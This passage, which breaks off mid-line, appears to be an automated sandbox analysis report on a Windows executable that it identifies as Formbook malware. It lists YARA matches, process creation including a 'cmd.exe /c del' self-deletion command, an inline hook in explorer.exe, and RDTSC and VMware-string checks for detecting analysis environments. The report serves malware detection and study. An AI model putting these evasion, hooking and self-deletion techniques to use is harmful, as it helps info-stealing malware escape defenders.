          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B65504_2_002B6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A71904_2_002A7190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC4_2_002C31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A52264_2_002A5226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AFA304_2_002AFA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A5E704_2_002A5E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A8AD74_2_002A8AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002ACB484_2_002ACB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C6FF04_2_002C6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B5FC84_2_002B5FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062B284_2_03062B28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305DBD24_2_0305DBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030503DA4_2_030503DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304FA2B4_2_0304FA2B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCEBB04_2_02FCEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030622AE4_2_030622AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAB404_2_02FBAB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A04_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB0904_2_02FAB090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030510024_2_03051002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306E8244_2_0306E824
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030620A84_2_030620A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB41204_2_02FB4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030628EC4_2_030628EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9F9004_2_02F9F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306DFCE4_2_0306DFCE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB6E304_2_02FB6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03061FF14_2_03061FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305D6164_2_0305D616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062EF74_2_03062EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062D074_2_03062D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03061D554_2_03061D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030625DD4_2_030625DD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA841F4_2_02FA841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAD5E04_2_02FAD5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305D4664_2_0305D466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC25814_2_02FC2581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F90D204_2_02F90D20
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86E91 appears 84 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86EA6 appears 36 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86FC1 appears 40 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D89100 appears 64 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 014FB150 appears 35 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D870FC appears 370 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D8BF63 appears 38 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02F9B150 appears 45 times
          Source: RRW9901200241.exe, 00000000.00000002.341417567.0000000000FF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000000.00000003.337793378.000000001B18F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RRW9901200241.exe
          Source: RRW9901200241.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@6/4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,4_2_002AC5CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,4_2_002CA0D2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: Kernel32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: IEUCIZEO0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: Kernel32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: IEUCIZEO2_2_00D81000
          Source: RRW9901200241.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RRW9901200241.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RRW9901200241.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\RRW9901200241.exeFile read: C:\Users\user\Desktop\RRW9901200241.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: RRW9901200241.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RRW9901200241.exe, 00000000.00000003.337251978.000000001B070000.00000004.00000001.sdmp, RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RRW9901200241.exe, cmd.exe
          Source: Binary string: cmd.pdb source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D89145 push ecx; ret 0_2_00D89158
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FFC06 pushad ; retf 0_2_012FFC25
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041E3CF push ds; ret 2_2_0041E3D3
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00417CE0 push 403FCDEBh; iretd 2_2_00417D3A
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00417CB6 push 403FCDEBh; iretd 2_2_00417D3A
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEF2 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEFB push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEA5 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CF5C push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00414F86 push edi; ret 2_2_00414F88
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D89145 push ecx; ret 2_2_00D89158
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0154D0D1 push ecx; ret 2_2_0154D0E4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B76BD push ecx; ret 4_2_002B76D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B76D1 push ecx; ret 4_2_002B76E4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FED0D1 push ecx; ret 4_2_02FED0E4

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000027D98E4 second address: 00000000027D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000027D9B4E second address: 00000000027D9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Windows\explorer.exe TID: 1040Thread sleep count: 49 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1040Thread sleep time: -98000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4868Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,4_2_002B245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,4_2_002B68BA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,4_2_002AB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_002A85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,4_2_002C31DC
          Source: explorer.exe, 00000003.00000000.364943349.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.364891332.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.368126601.0000000008662000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.357665667.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.364891332.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.357665667.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.691817008.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000003.00000000.364593921.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.364593921.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.364943349.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D889BC _memset,IsDebuggerPresent,0_2_00D889BC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D869A0 mov eax, dword ptr fs:[00000030h]0_2_00D869A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FED06 mov eax, dword ptr fs:[00000030h]0_2_012FED06
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF575 mov eax, dword ptr fs:[00000030h]0_2_012FF575
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF5B2 mov eax, dword ptr fs:[00000030h]0_2_012FF5B2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF75D mov eax, dword ptr fs:[00000030h]0_2_012FF75D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF615 mov eax, dword ptr fs:[00000030h]0_2_012FF615
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D869A0 mov eax, dword ptr fs:[00000030h]2_2_00D869A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151B944 mov eax, dword ptr fs:[00000030h]2_2_0151B944
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151B944 mov eax, dword ptr fs:[00000030h]2_2_0151B944
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC962 mov eax, dword ptr fs:[00000030h]2_2_014FC962
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB171 mov eax, dword ptr fs:[00000030h]2_2_014FB171
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB171 mov eax, dword ptr fs:[00000030h]2_2_014FB171
          Source: C:\Users\user\Desktop\RRW9901200241.exe